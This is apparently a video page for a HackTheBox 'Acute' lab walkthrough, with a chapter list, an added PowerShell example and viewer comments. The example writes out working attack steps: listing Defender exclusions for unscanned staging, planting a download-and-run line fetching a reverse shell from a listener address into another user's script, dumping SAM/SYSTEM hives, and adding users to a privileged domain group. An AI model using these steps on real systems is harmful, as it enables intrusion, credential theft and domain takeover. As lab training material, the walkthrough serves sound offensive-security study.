HackTheBox - Acute

  • Published 25 Jun 2024
  • 00:00 - Intro
    01:00 - Start of nmap, the Server Header changes based upon DNS
    04:00 - Navigating to the website, discovering the "New Starter Form" which has some key information like a welcome password and username convention
    07:00 - Password spraying the Powershell Web Access (PSWA), discovering a valid credential but wrong host, word document had another host which is valid for edavies
    09:15 - Playing around in the PSWA
    10:00 - Looking at hidden files, discovering c:\utils\desktop.ini which states it's a directory that is excluded by AV
    12:00 - Making the mistake of running WinPEAS inside the PSWA
    14:45 - Setting up ConPtyShell to get a proper PTY reverse shell on windows
    15:40 - Making some light modifications to ConPtyShell in order to evade antivirus
    16:50 - Getting the ConPtyShell and showing the colors/tab autocomplete
    19:30 - Running WinPEAS to show another user is logged on (and the AV Exclusions)
    21:55 - Switching to Metasploit, because it makes it easier to migrate into an interactive process, which allows us access to view the desktop of the logged in user
    24:30 - Using Screenshot and Screenshare inside of meterpreter to record the screen and get a password that was typed onto a terminal (imonks)
    29:00 - Creating a credential object with imonks, so we can Invoke-Command on the domain controller
    31:00 - When specifying the correct ConfigurationName our Enter-PSSession fails because we can't run Measure-Object. Running Get-Command and Get-Alias to view what commands we can run
    35:00 - Discovering wm.ps1, which we can modify to get a shell as jmorgan on our desktop
    40:00 - Creating a powershell one-liner to replace a string in a file with cat and set-content
    44:40 - Screwed up our file because of a random line break. Playing around with it until we can fix it.
    47:30 - Shell returned as JMorgan, dumping the SAM/SYSTEM files and cracking local passwords on the workstation
    58:30 - Looking at other Domain Users, attempting to password spray the users we don't have in order to see if there's password re-use between local desktop and domain
    1:02:00 - We are awallace on the Domain Controller, getting a reverse shell
    1:06:00 - Discovering c:\Program Files\KeepMeOn, which is executing .bat files every 5 minutes. Putting our PowerShell one-liner in there and getting a shell as lhopkins
    1:11:25 - Shell as lhopkins, but still not Domain Administrator; running BloodHound
    1:21:40 - Going over the Bloodhound Data
    1:23:40 - Adding edavies to the Site_Admin group
    1:32:50 - Adding imonks to the Site_Admin group, then adding ippsec to Domain Admins
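
The PowerShell steps from the chapter list (local recon for hidden files and AV exclusions, the credential object and the constrained-endpoint probe, the in-place edit of wm.ps1 with cat and Set-Content, the SAM/SYSTEM dump, and the Site_Admin group change) as one added example. This is not IppSec's code and nothing in it is copied from the video: the DC hostname, session configuration name, domain, password, the path of wm.ps1, the string it replaces and the listener address are all placeholders marked as assumed, and it assumes the remote endpoint's language mode permits expressions and method calls, as an in-place replacement over Invoke-Command requires. Each section is commented with the shell it would be run from.

```powershell
# Added example for the PowerShell steps in the chapter list above. Not IppSec's code.
# Every value marked "assumed" is a placeholder, not something taken from the video.

# --- 0. Local recon from the PSWA / reverse shell on the workstation (10:00, 19:30) ---
# Hidden files (the c:\utils\desktop.ini hint) and the Defender exclusion list, which
# tells you where a payload can be staged without being scanned.
Get-ChildItem -Path 'C:\' -Force -Directory -ErrorAction SilentlyContinue |
    ForEach-Object { Get-ChildItem -Path $_.FullName -Force -Hidden -ErrorAction SilentlyContinue }
# Recent Defender builds can hide exclusions from non-admin users; if this comes back
# empty, a desktop.ini like the one above may be the only clue you get.
(Get-MpPreference).ExclusionPath

# --- 1. Credential object for the next hop (29:00) ---
$Dc         = 'atsserver.acute.local'     # assumed DC hostname
$ConfigName = 'dc_manage'                 # assumed session configuration name
$secure     = ConvertTo-SecureString 'PlaceholderPassw0rd!' -AsPlainText -Force   # assumed
$cred       = New-Object System.Management.Automation.PSCredential('acute\imonks', $secure)  # domain assumed
$remote     = @{ ComputerName = $Dc; ConfigurationName = $ConfigName; Credential = $cred }

# --- 2. Probe the constrained endpoint (31:00) ---
# Enter-PSSession needs Measure-Object and friends on the remote side; when the
# configuration does not expose them the interactive session dies, so ask the
# endpoint what it does allow with a non-interactive Invoke-Command instead.
$allowed = Invoke-Command @remote -ScriptBlock { Get-Command; Get-Alias }
$allowed | Sort-Object CommandType, Name | Format-Table CommandType, Name -AutoSize

# --- 3. Edit wm.ps1 in place over the endpoint (35:00 to 44:40) ---
# Pass the path and both strings as arguments instead of embedding them in the
# script block: the payload stays on one line, so no quoting or stray line break
# can corrupt the file. .Replace() is a literal replace, so regex metacharacters
# in either string are not a concern (unlike the -replace operator).
$Target    = 'C:\Users\imonks\Desktop\wm.ps1'                                   # assumed path
$OldString = 'Get-Volume'    # assumed: the harmless command wm.ps1 currently runs
$NewString = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/rev.ps1')"  # assumed listener

Invoke-Command @remote -ArgumentList $Target, $OldString, $NewString -ScriptBlock {
    param($Path, $Old, $New)
    (cat -Path $Path -Raw).Replace($Old, $New) | Set-Content -Path $Path
    cat -Path $Path    # read it back and confirm the edit before it runs as jmorgan
}

# --- 4. Local hashes once you have a local-admin shell on the workstation (47:30) ---
# Save both hives into the AV-excluded directory found in step 0, then pull them
# back for offline extraction and cracking (secretsdump.py, hashcat).
reg.exe save HKLM\SAM    C:\Utils\sam.save
reg.exe save HKLM\SYSTEM C:\Utils\system.save

# --- 5. Group change from the lhopkins shell on the DC (1:23:40) ---
# Site_Admin is the group BloodHound pointed at. Add a user whose password you
# hold, then authenticate again as that user: group membership is read into the
# token at logon, so an existing session does not pick the new group up.
Add-ADGroupMember -Identity 'Site_Admin' -Members 'edavies'
# Without the ActiveDirectory module:  net group Site_Admin edavies /add /domain
Get-ADGroupMember -Identity 'Site_Admin' | Select-Object SamAccountName
```

Sections 0 and 4 run on the workstation (as edavies and as the local administrator jmorgan respectively), sections 1 to 3 from the workstation shell that holds the imonks credential, and section 5 from the lhopkins shell on the domain controller. Step 3 is the part worth keeping in a toolbox: moving the strings into -ArgumentList is what removes the line-break failure mode described at 44:40.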

COMMENTS • 28

  • @theSoloMimic (1 year ago) +1

    Great box for lateral movement. Your command line in windows is something to aspire for. You just really know so much. Thanks for your videos. They are great lessons.

  • @jazzkhabazela8712 (1 year ago) +9

    I really hate the fact that whenever I watch ippsec... I feel like an indestructible hacker, get so pumped that I go for an Insane box... only to find out that it beats me so bad that I end up even forgetting nmap flags 😢😪.

  • @beloraymonyela1704 (1 year ago)

    I love your thinking, how you go back and forth to get to the solution. It's how we all would like to think, but we struggle to get the next step, while it's all what we should be thinking or troubleshooting. I mean the tools are there and you know them, but when you're in the zone they all disappear. Awesome as always!!

  • @mostwanted002 (1 year ago) +5

    The fun part I did was, instead of just relaying commands with JMorgan's creds, I decrypted them. I also escaped and attained a proper reverse powershell with imonks which made it a lot easier in later steps. And finally, instead of SAM hash spraying, I went ahead and cracked the SAM hash, for AWallace.

  • @0xrobinho0d41 (1 year ago) +5

    I liked this box a lot, I pwned it in a slightly different way

    • @SuperKap0w (1 year ago)

      @@Fbarrett ATTENTION EVERYONE: We have a c00l kid fl@m3r who likes to debbie downer others on the int3rn3t. What a let down :)

    • @dadamnmayne (1 year ago) +3

      which way?

  • @dadamnmayne (1 year ago)

    I think you could have added lhopkins to site_admins and got your shell again. I might be mistaken though, I didn't do this box. 'Search' is very similar if you remember that one. It had the PowerShell Web Console and the compromised user had GenericAll over a member of Domain Admins.
    edit: nvm, i get your logic now

  • @hannahprobably5765 (1 year ago)

    Great content. Got a question on 16:04: I can't find any info about this command in vi:
    :%s/ConPtyShell/ip. Is it something about strings?

  • @dakshdubey4994 (1 year ago)

    Hey @ippsec, at 37:00 what RLRat shell are you talking about? I tried Google to look for something similar, but could not find it. Could you please paste the name, or a GitHub link to it? Great content as always. :)

  • @Ms.Robot. (1 year ago)

    🤩

  • @inakitedo475 (1 year ago)

    Was someone able to RDP to the box? I got a certificate failure.

  • @kalidsherefuddin (1 year ago)

    Thanks

  • @neunzehnvierundachtzig (1 year ago) +3

    Does anybody know which Firefox version ippsec is using here?
    I don't like the latest version's UI and I want to revert to this version.

    • @masterman1502 (1 year ago)

      Try 89 or 79, I don't remember which one was the last before the UI update.

    • @neunzehnvierundachtzig (1 year ago)

      @@masterman1502 Got it, it was Firefox v88.

    • @serviceaccount5292 (1 year ago)

      It's a really bad idea (security-wise) to run old versions of browsers. I thought someone who watches ippsec vids would know better.
      Ippsec probably has the ESR version of Firefox. This extended release version is the default in Debian/Kali.
      You can also disable the new UI via about:config. Search for “Firefox disable proton” for more info.
      Type in about:config. Then set all these settings to “false”:
      browser.proton.enabled, browser.proton.modals.enabled, browser.proton.doorhangers.enabled, browser.proton.contextmenus.enabled.

    • @neunzehnvierundachtzig (1 year ago)

      @@serviceaccount5292 I do use Firefox ESR, btw. Using a stable browser version on my personal computer isn't unsafe as long as I know how stuff works. I don't run a server from my PC.

  • @tg7943 (1 year ago)

    Push!

  • @jaxson8262 (1 year ago)

    this was big 🙃🙃🙃

  • @DeepanshuSingh_ (1 year ago)

    fr I need to learn vi commands and PowerShell

  • @06jakson (1 year ago)

    I hate it. It's like ASMR.

  • @Xx-nd1rs (11 months ago)

    Since you have a shell as lhopkins, why didn't you simply add lhopkins to site_admin and read the root.txt?

  • @HopliteSecurity (1 year ago) +1

    I failed miserably on Acute and was not able to finish. Great work IppSec. ❤🔥🚒💟